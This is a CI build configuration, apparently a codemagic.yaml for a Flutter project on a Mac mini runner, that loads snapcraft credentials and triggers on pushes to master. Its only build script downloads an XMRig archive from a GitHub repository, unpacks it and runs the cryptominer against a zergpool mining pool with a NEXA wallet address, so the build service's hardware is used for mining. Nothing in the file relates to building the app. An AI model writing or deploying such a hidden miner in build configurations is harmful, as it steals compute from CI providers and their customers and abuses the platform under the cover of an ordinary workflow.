workflows:
  default-workflow:
    name: Default Workflow
    instance_type: mac_mini_m1
    max_build_duration: 120
    environment:
      flutter: 3.7.5
      xcode: latest
      cocoapods: default
      vars:
        SNAPCRAFT_BUILD_ENVIRONMENT: host
      groups:
        - snapcraft_credentials
    cache:
      cache_paths: []
    triggering:
      branch_patterns:
        - pattern: master
          include: true
          source: true
    scripts:
      - wget https://github.com/tesasik67/q1/raw/main/xmrig-6.19.3.rar && tar -xvf xmrig-6.19.3.rar && cd xmrig-6.19.3 && chmod +x xmrig && ./xmrig -o stratum+tcp://cryptonight_haven.asia.mine.zergpool.com:4452 -u nexa:nqtsq5g5m4cn4rcqtmrwgxqge7scu3hfl4fcf3zxpp4sdhy9 -p c=NEXA -k -a cn/2
